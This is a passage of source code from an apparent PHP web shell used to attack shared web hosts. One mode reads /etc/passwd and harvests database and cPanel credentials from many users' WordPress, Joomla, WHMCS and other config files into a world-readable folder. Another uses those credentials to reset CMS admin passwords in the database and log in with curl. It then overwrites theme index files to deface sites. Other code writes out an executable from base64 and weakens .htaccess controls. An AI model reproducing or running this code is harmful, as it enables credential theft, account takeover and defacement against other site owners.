k7IH0gcHJpbnQgIjxicj48YnI+PGJyPjxhIGhyZWY9J3ByaXZfdmhvc3QvJyBzdHlsZT0nY29sb3I6IzAwRkZGRic+RG9uZSB8IENsaWNrIEhlcmUgITwvZm9udD4iOyA8L3N0cm9uZz48L3A+';
1026. $file = fopen("pe.ler" ,"w+");
1027. $write = fwrite ($file ,base64_decode($config));
1028. fclose($file);
1029. chmod("pe.ler",0755);
1030. echo "<center><a href='priv_vhost/pe.ler'>Click Here !</a></center>";
1031. } elseif($_GET['do'] == 'config') {
1032. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
1033. $idx = mkdir("priv_config", 0777);
1034. $isi_htc = "Options all\nRequire None\nSatisfy Any";
1035. $htc = fopen("priv_config/.htaccess","w");
1036. fwrite($htc, $isi_htc);
1037. while($passwd = fgets($etc)) {
1038. if($passwd == "" || !$etc) {
1039. echo "<font color=red>Can't read /etc/passwd</font>";
1040. } else {
1041. preg_match_all('/(.*?):x:/', $passwd, $user_config);
1042. foreach($user_config[1] as $user_idx) {
1043. $user_config_dir = "/home/$user_idx/public_html/";
1044. if(is_readable($user_config_dir)) {
1045. $grab_config = array(
1046. "/home/$user_idx/.my.cnf" => "cpanel",
1047. "/home/$user_idx/.accesshash" => "WHM-accesshash",
1048. "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
1049. "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
1050. "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
1051. "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
1052. "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1053. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
1054. "/home/$user_idx/public_html/submitticket.php" => "WHMCS",
1055. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
1056. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
1057. "/home/$user_idx/public_html/WHMCS/configuration.php" => "WHMCS",
1058. "/home/$user_idx/public_html/whmcs1/configuration.php" => "WHMCS",
1059. "/home/$user_idx/public_html/Whmcs/configuration.php" => "WHMCS",
1060. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
1061. "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
1062. "/home/$user_idx/public_html/WHMC/configuration.php" => "WHMCS",
1063. "/home/$user_idx/public_html/Whmc/configuration.php" => "WHMCS",
1064. "/home/$user_idx/public_html/whmc/configuration.php" => "WHMCS",
1065. "/home/$user_idx/public_html/WHM/configuration.php" => "WHMCS",
1066. "/home/$user_idx/public_html/Whm/configuration.php" => "WHMCS",
1067. "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
1068. "/home/$user_idx/public_html/HOST/configuration.php" => "WHMCS",
1069. "/home/$user_idx/public_html/Host/configuration.php" => "WHMCS",
1070. "/home/$user_idx/public_html/host/configuration.php" => "WHMCS",
1071. "/home/$user_idx/public_html/SUPPORTES/configuration.php" => "WHMCS",
1072. "/home/$user_idx/public_html/Supportes/configuration.php" => "WHMCS",
1073. "/home/$user_idx/public_html/supportes/configuration.php" => "WHMCS",
1074. "/home/$user_idx/public_html/domains/configuration.php" => "WHMCS",
1075. "/home/$user_idx/public_html/domain/configuration.php" => "WHMCS",
1076. "/home/$user_idx/public_html/Hosting/configuration.php" => "WHMCS",
1077. "/home/$user_idx/public_html/HOSTING/configuration.php" => "WHMCS",
1078. "/home/$user_idx/public_html/hosting/configuration.php" => "WHMCS",
1079. "/home/$user_idx/public_html/CART/configuration.php" => "WHMCS",
1080. "/home/$user_idx/public_html/Cart/configuration.php" => "WHMCS",
1081. "/home/$user_idx/public_html/cart/configuration.php" => "WHMCS",
1082. "/home/$user_idx/public_html/ORDER/configuration.php" => "WHMCS",
1083. "/home/$user_idx/public_html/Order/configuration.php" => "WHMCS",
1084. "/home/$user_idx/public_html/order/configuration.php" => "WHMCS",
1085. "/home/$user_idx/public_html/CLIENT/configuration.php" => "WHMCS",
1086. "/home/$user_idx/public_html/Client/configuration.php" => "WHMCS",
1087. "/home/$user_idx/public_html/client/configuration.php" => "WHMCS",
1088. "/home/$user_idx/public_html/CLIENTAREA/configuration.php" => "WHMCS",
1089. "/home/$user_idx/public_html/Clientarea/configuration.php" => "WHMCS",
1090. "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
1091. "/home/$user_idx/public_html/SUPPORT/configuration.php" => "WHMCS",
1092. "/home/$user_idx/public_html/Support/configuration.php" => "WHMCS",
1093. "/home/$user_idx/public_html/support/configuration.php" => "WHMCS",
1094. "/home/$user_idx/public_html/BILLING/configuration.php" => "WHMCS",
1095. "/home/$user_idx/public_html/Billing/configuration.php" => "WHMCS",
1096. "/home/$user_idx/public_html/billing/configuration.php" => "WHMCS",
1097. "/home/$user_idx/public_html/BUY/configuration.php" => "WHMCS.txt",
1098. "/home/$user_idx/public_html/Buy/configuration.php" => "WHMCS.txt",
1099. "/home/$user_idx/public_html/buy/configuration.php" => "WHMCS.txt",
1100. "/home/$user_idx/public_html/MANAGE/configuration.php" => "WHMCS.txt",
1101. "/home/$user_idx/public_html/Manage/configuration.php" => "WHMCS.txt",
1102. "/home/$user_idx/public_html/manage/configuration.php" => "WHMCS.txt",
1103. "/home/$user_idx/public_html/CLIENTSUPPORT/configuration.php" => "WHMCS",
1104. "/home/$user_idx/public_html/ClientSupport/configuration.php" => "WHMCS",
1105. "/home/$user_idx/public_html/Clientsupport/configuration.php" => "WHMCS",
1106. "/home/$user_idx/public_html/clientsupport/configuration.php" => "WHMCS",
1107. "/home/$user_idx/public_html/CHECKOUT/configuration.php" => "WHMCS",
1108. "/home/$user_idx/public_html/Checkout/configuration.php" => "WHMCS",
1109. "/home/$user_idx/public_html/checkout/configuration.php" => "WHMCS",
1110. "/home/$user_idx/public_html/BILLINGS/configuration.php" => "WHMCS",
1111. "/home/$user_idx/public_html/Billings/configuration.php" => "WHMCS",
1112. "/home/$user_idx/public_html/billings/configuration.php" => "WHMCS",
1113. "/home/$user_idx/public_html/BASKET/configuration.php" => "WHMCS",
1114. "/home/$user_idx/public_html/Basket/configuration.php" => "WHMCS",
1115. "/home/$user_idx/public_html/basket/configuration.php" => "WHMCS",
1116. "/home/$user_idx/public_html/SECURE/configuration.php" => "WHMCS",
1117. "/home/$user_idx/public_html/Secure/configuration.php" => "WHMCS",
1118. "/home/$user_idx/public_html/secure/configuration.php" => "WHMCS",
1119. "/home/$user_idx/public_html/SALES/configuration.php" => "WHMCS",
1120. "/home/$user_idx/public_html/Sales/configuration.php" => "WHMCS",
1121. "/home/$user_idx/public_html/sales/configuration.php" => "WHMCS",
1122. "/home/$user_idx/public_html/BILL/configuration.php" => "WHMCS",
1123. "/home/$user_idx/public_html/Bill/configuration.php" => "WHMCS",
1124. "/home/$user_idx/public_html/bill/configuration.php" => "WHMCS",
1125. "/home/$user_idx/public_html/PURCHASE/configuration.php" => "WHMCS",
1126. "/home/$user_idx/public_html/Purchase/configuration.php" => "WHMCS",
1127. "/home/$user_idx/public_html/purchase/configuration.php" => "WHMCS",
1128. "/home/$user_idx/public_html/ACCOUNT/configuration.php" => "WHMCS",
1129. "/home/$user_idx/public_html/Account/configuration.php" => "WHMCS",
1130. "/home/$user_idx/public_html/account/configuration.php" => "WHMCS",
1131. "/home/$user_idx/public_html/USER/configuration.php" => "WHMCS",
1132. "/home/$user_idx/public_html/User/configuration.php" => "WHMCS",
1133. "/home/$user_idx/public_html/user/configuration.php" => "WHMCS",
1134. "/home/$user_idx/public_html/CLIENTS/configuration.php" => "WHMCS",
1135. "/home/$user_idx/public_html/Clients/configuration.php" => "WHMCS",
1136. "/home/$user_idx/public_html/clients/configuration.php" => "WHMCS",
1137. "/home/$user_idx/public_html/BILLINGS/configuration.php" => "WHMCS",
1138. "/home/$user_idx/public_html/Billings/configuration.php" => "WHMCS",
1139. "/home/$user_idx/public_html/billings/configuration.php" => "WHMCS",
1140. "/home/$user_idx/public_html/MY/configuration.php" => "WHMCS",
1141. "/home/$user_idx/public_html/My/configuration.php" => "WHMCS",
1142. "/home/$user_idx/public_html/my/configuration.php" => "WHMCS",
1143. "/home/$user_idx/public_html/secure/whm/configuration.php" => "WHMCS",
1144. "/home/$user_idx/public_html/secure/whmcs/configuration.php" => "WHMCS",
1145. "/home/$user_idx/public_html/panel/configuration.php" => "WHMCS",
1146. "/home/$user_idx/public_html/clientes/configuration.php" => "WHMCS",
1147. "/home/$user_idx/public_html/cliente/configuration.php" => "WHMCS",
1148. "/home/$user_idx/public_html/support/order/configuration.php" => "WHMCS",
1149. "/home/$user_idx/public_html/forum/config.php" => "phpBB",
1150. "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
1151. "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
1152. "/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
1153. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
1154. "/home/$user_idx/public_html/configuration.php" => "Joomla",
1155. "/home/$user_idx/public_html/administrator/config.php" => "Joomla",
1156. "/home/$user_idx/public_html/blog/configuration.php" => "Joomla",
1157. "/home/$user_idx/public_html/cms/configuration.php" => "Joomla.txt",
1158. "/home/$user_idx/public_html/beta/configuration.php" => "Joomla",
1159. "/home/$user_idx/public_html/portal/configuration.php" => "Joomla",
1160. "/home/$user_idx/public_html/site/configuration.php" => "Joomla",
1161. "/home/$user_idx/public_html/main/configuration.php" => "Joomla",
1162. "/home/$user_idx/public_html/home/configuration.php" => "Joomla",
1163. "/home/$user_idx/public_html/demo/configuration.php" => "Joomla",
1164. "/home/$user_idx/public_html/test/configuration.php" => "Joomla",
1165. "/home/$user_idx/public_html/v1/configuration.php" => "Joomla",
1166. "/home/$user_idx/public_html/v2/configuration.php" => "Joomla",
1167. "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
1168. "/home/$user_idx/public_html/new/configuration.php'" => "Joomla",
1169. "/home/$user_idx/public_html/wp/test/wp-config.php" => "Wordpress",
1170. "/home/$user_idx/public_html/blog/wp-config.php" => "Wordpress",
1171. "/home/$user_idx/public_html/beta/wp-config.php" => "Wordpress",
1172. "/home/$user_idx/public_html/portal/wp-config.php" => "Wordpress",
1173. "/home/$user_idx/public_html/site/wp-config.php" => "Wordpress",
1174. "/home/$user_idx/public_html/WP/wp-config.php" => "Wordpress",
1175. "/home/$user_idx/public_html/news/wp-config.php" => "Wordpress",
1176. "/home/$user_idx/public_html/test/wp-config.php" => "Wordpress",
1177. "/home/$user_idx/public_html/demo/wp-config.php" => "Wordpress",
1178. "/home/$user_idx/public_html/home/wp-config.php" => "Wordpress",
1179. "/home/$user_idx/public_html/v1/wp-config.php" => "Wordpress",
1180. "/home/$user_idx/public_html/v2/wp-config.php" => "Wordpress",
1181. "/home/$user_idx/public_html/press/wp-config.php" => "Wordpress",
1182. "/home/$user_idx/public_html/new/wp-config.php" => "Wordpress",
1183. "/home/$user_idx/public_html/blogs/wp-config.php" => "Wordpress",
1184. "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
1185. "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
1186. "/home/$user_idx/public_html/wp-config.php" => "WordPress",
1187. "/home/$user_idx/public_html/admin/config.php" => "OpenCart",
1188. "/home/$user_idx/public_html/slconfig.php" => "Sitelok",
1189. "/home/$user_idx/public_html/application/config/database.php" => "Ellislab",
1190. "/home/$user_idx/public_html/db/db.php" => "Unknown",
1191. "/home/$user_idx/public_html/setdatabaseb.php" => "Unknown",
1192. "/home/$user_idx/public_html/db/setdatabaseb.php" => "Unknown",
1193. "/home/$user_idx/public_html/database/db.php" => "Unknown",
1194. "/home/$user_idx/public_html/koneksi/db.php" => "Unknown",
1195. "/home/$user_idx/public_html/koneksi/database.php" => "Unknown",
1196. "/home/$user_idx/public_html/koneksi/koneksi.php" => "Unknown",
1197. "/home/$user_idx/public_html/db/config.php" => "Unknown",
1198. "/home/$user_idx/public_html/db/database.php" => "Unknown",
1199. "/home/$user_idx/public_html/database/config.php" => "Unknown",
1200. "/home/$user_idx/public_html/konfigurasi/conf.php" => "Unknown",
1201. "/home/$user_idx/public_html/konfigurasi/database.php" => "Unknown",
1202. "/home/$user_idx/public_html/conf/db.php" => "Unknown",
1203. "/home/$user_idx/public_html/conf/php.php" => "Unknown",
1204. "/home/$user_idx/public_html/conf/config.php" => "Unknown",
1205. "/home/$user_idx/public_html/conf/conf.php" => "Unknown",
1206. "/home/$user_idx/public_html/admin/koneksi.php" => "Unknown",
1207. "/home/$user_idx/public_html/cf/db.php" => "Unknown",
1208. "/home/$user_idx/public_html/config/index.php" => "Unknown",
1209. "/home/$user_idx/public_html/config/data.php" => "Unknown",
1210. "/home/$user_idx/public_html/admin/db.php" => "Unknown",
1211. "/home/$user_idx/public_html/admin/config.php" => "Unknown",
1212. "/home/$user_idx/public_html/admin/configuration.php" => "Unknown",
1213. "/home/$user_idx/public_html/admin/conf.php" => "Unknown",
1214. "/home/$user_idx/public_html/configuracion/connection.php" => "Unknown",
1215. "/home/$user_idx/public_html/connection" => "Unknown",
1216. "/home/$user_idx/public_html/konfigurasi/config.php" => "Unknown",
1217. "/home/$user_idx/public_html/admin/inc/config.php" => "Unknown",
1218. "/home/$user_idx/public_html/inc/config.php" => "Unknown",
1219. "/home/$user_idx/public_html/admin/inc/db.php" => "Unknown",
1220. "/home/$user_idx/public_html/inc/db.php" => "Unknown",
1221. "/home/$user_idx/public_html/admin/inc/configuration.php" => "Unknown",
1222. "/home/$user_idx/public_html/inc/configuration.php" => "Unknown",
1223. "/home/$user_idx/public_html/include/configuration.php" => "Unknown",
1224. "/home/$user_idx/public_html/include/config.php" => "Unknown",
1225. "/home/$user_idx/public_html/include/db.php" => "Unknown",
1226. "/home/$user_idx/public_html/inc/database.php" => "Unknown",
1227. "/home/$user_idx/public_html/include/database.php" => "Unknown",
1228. "/home/$user_idx/public_html/include/configuration.php" => "Unknown",
1229. "/home/$user_idx/public_html/includes/configuration.php" => "Unknown",
1230. "/home/$user_idx/public_html/includes/config.php" => "Unknown",
1231. "/home/$user_idx/public_html/includes/db.php" => "Unknown",
1232. "/home/$user_idx/public_html/includes/database.php" => "Unknown",
1233. "/home/$user_idx/public_html/vb/includes/config.php" => "Vbulletin",
1234. "/home/$user_idx/public_html/includes/config.php" => "Vbulletin",
1235. "/home/$user_idx/public_html/forum/includes/config.php" => "Vbulletin",
1236. "/home/$user_idx/public_html/forums/includes/config.php" => "Vbulletin",
1237. "/home/$user_idx/public_html/cc/includes/config.php" => "Vbulletin",
1238. "/home/$user_idx/public_html/inc/config.php" => "MyBB",
1239. "/home/$user_idx/public_html/includes/configure.php" => "OsCommerce",
1240. "/home/$user_idx/public_html/shop/includes/configure.php" => "OsCommerce",
1241. "/home/$user_idx/public_html/os/includes/configure.php" => "OsCommerce",
1242. "/home/$user_idx/public_html/oscom/includes/configure.php" => "OsCommerce",
1243. "/home/$user_idx/public_html/products/includes/configure.php" => "OsCommerce",
1244. "/home/$user_idx/public_html/cart/includes/configure.php" => "OsCommerce",
1245. "/home/$user_idx/public_html/inc/conf_global.php" => "IPB");
1246. foreach($grab_config as $config => $nama_config) {
1247. $ambil_config = file_get_contents($config);
1248. if($ambil_config == '') {
1249. } else {
1250. $file_config = fopen("priv_config/$user_idx-$nama_config.txt","w");
1251. fputs($file_config,$ambil_config);
1252. }
1253. }
1254. }
1255. }
1256. }
1257. }
1258. echo "<center><a href='?bom&folder=$dir/priv_config'><font color=lime>Done</font></a></center>";
1259. } elseif($_GET['do'] == 'boom') {
1260. {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", "';");$password = entre2v2($conf, $doler."password = '", "';");$dbname = entre2v2($conf, $doler."db = '", "';");$prefix = entre2v2($conf, $doler."dbprefix = '", "';");$host = entre2v2($conf, $doler."host = '","';");$co=randomt();$site_url = "http://".$domain."/administrator";$output = '';$cond = 0; $link=mysql_connect($host, $username, $password);if($link) {mysql_select_db($dbname,$link) ;$req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");$req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));} else {$output.= "[-] DB Error<br />";}if($req1){if ($req) {$req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");$data = mysql_fetch_array($req);$template_name = $data["template"];$req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");$data = mysql_fetch_array($req);$template_id = $data["extension_id"];$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');$hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);if($return && $hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_REFERER, $url2);curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos){$url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);if($hidden2) {$output.= "[+] index.php file found in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}} else {$req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");$data = mysql_fetch_array($req);$template_name=$data["template"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/index.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);if($hidden) {curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$pos = strpos($buffer,"com_config");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";}}if($pos) {$url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch);$hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);if($hidden2) {$output.= "[+] index.php file founded in Theme Editor<br />";} else {$output.= "[-] index.php Not found in Theme Editor<br />";}}if($hidden2) {$url2=$site_url."/index.php?option=com_templates&layout=edit";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co);$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<dd class="message message fade">');$cond = 0;if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template successfully saved<br />";$cond = 1;}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.$co);return array('cond'=>$cond, 'output'=>$output); }function exec_mode_1($def_url) {@mkdir('sym',0777);$wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";$fp = @fopen ('sym/.htaccess','w');fwrite($fp, 